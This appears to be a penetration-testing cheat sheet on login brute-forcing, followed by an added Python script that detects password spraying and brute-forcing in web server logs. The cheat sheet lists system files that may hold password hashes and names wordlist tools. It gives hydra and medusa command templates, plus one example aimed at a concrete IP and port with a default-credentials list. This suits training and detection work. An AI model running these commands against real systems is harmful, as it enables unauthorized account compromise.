Login Bruteforcing
In Windows, the following files might contain password hashes:
unattend.xml
sysprep.inf
SAM
In Linux, the following files might contain password hashes:
shadow
shadow.bak
password
Since humans are generally lazy, it's a good idea to start by testing default credentials.
Tools like hydra and medusa can be used to perform brute-force attacks.
Username Anarchy is a tool that can be used to create a customized username wordlist.
CUPP is a tool that can be used to create customized password wordlists.
After creating the custom wordlists, the grep command can be used to optimize them further based on the system's password policies (e.g. minimum 6 characters or minimum 1 special character).
Commands:
#Command to bruteforce a basic http authentication form
#Since we have the -C flag, the wordlist should be in the format Username:Password
hydra -C <Credentials-Word-List> <Target-IP-Address> -s <Target-Port> http-get <Target-Path>
#Command for separate wordlists for usernames and passwords.
#The flag -u is to try all the usernames with the same password instead of the opposite (All passwords for one user).
hydra -L <Username-Word-List> -P <Password-Word-List> -u -f <Target-IP-Address> -s <Target-Port> http-get <Target-Path>
#The uppercase -L and -P flags specify wordlist files. To specify a single value instead, use the lowercase flags (-l, -p) followed by the value.
#To find the supported services by Hydra
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
#To bruteforce a PHP/Other authentication form
hydra -C <Credentials-Word-List> <Target-IP-Address> -s <Target-Port> http-post-form "<Login-Page-URI>:<Username-Parameter-Name>=^USER^&<Password-Parameter-Name>=^PASS^:F=<Code-Only-Exist-In-Login-Page>"
#Example:
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
#Service Bruteforcing
hydra -L <Username-Word-List> -P <Password-Word-List> -u -f <Service-Name>://<Target-IP-Address>:<Target-Port> -t 4
#Medusa Command Template
medusa -M <Module-Name> -h <Target> -U <Username-Word-List> -P <Password-Word-List> -m <Optional-Module-Options>
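
Detection side of the two hydra orderings above: with -u one password is tried across many usernames, while the default order tries many passwords against one username, and the two leave different patterns of 401 responses in a web server's access log. The Python below is an added example, not part of the original notes; it assumes Apache/nginx combined log format with the basic-auth username in the third field, and the thresholds, IP addresses and account names are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: ip, ident, auth user, [time], "request", status
LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "[^"]*" (\d{3}) ')

def classify(lines, window=timedelta(minutes=5), min_failures=10, spray_users=5):
    """Map each source IP with >= min_failures 401s inside one window to
    'spray' (many usernames) or 'bruteforce' (few usernames)."""
    fails = defaultdict(list)  # ip -> [(time, user)]
    for line in lines:
        m = LINE.match(line)
        # user "-" is the credential-less first request of a normal client
        if not m or m.group(4) != "401" or m.group(2) == "-":
            continue
        when = datetime.strptime(m.group(3), "%d/%b/%Y:%H:%M:%S %z")
        fails[m.group(1)].append((when, m.group(2)))
    verdicts = {}
    for ip, events in fails.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # shrink the window from the left until it spans <= `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            burst = events[start:end + 1]
            if len(burst) >= min_failures:
                users = {u for _, u in burst}
                verdicts[ip] = "spray" if len(users) >= spray_users else "bruteforce"
                break
    return verdicts

def sample_log():
    """Constructed log lines (documentation IPs, made-up accounts)."""
    t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    def line(ip, user, sec, status):
        ts = (t0 + timedelta(seconds=sec)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - {user} [{ts}] "GET /admin/ HTTP/1.1" {status} 381'
    log = [line("192.0.2.10", f"user{i}", i, 401) for i in range(12)]  # one password, many users
    log += [line("192.0.2.20", "admin", i, 401) for i in range(15)]    # many passwords, one user
    log += [line("192.0.2.30", "alice", s, c)                          # two typos, then success
            for s, c in ((0, 401), (20, 401), (40, 200))]
    log.append(line("192.0.2.30", "-", 60, 401))                       # normal auth challenge
    return log

if __name__ == "__main__":
    print(classify(sample_log()))
```

Keep spray_users at or below min_failures, otherwise a burst can never reach the spray threshold before it is classified.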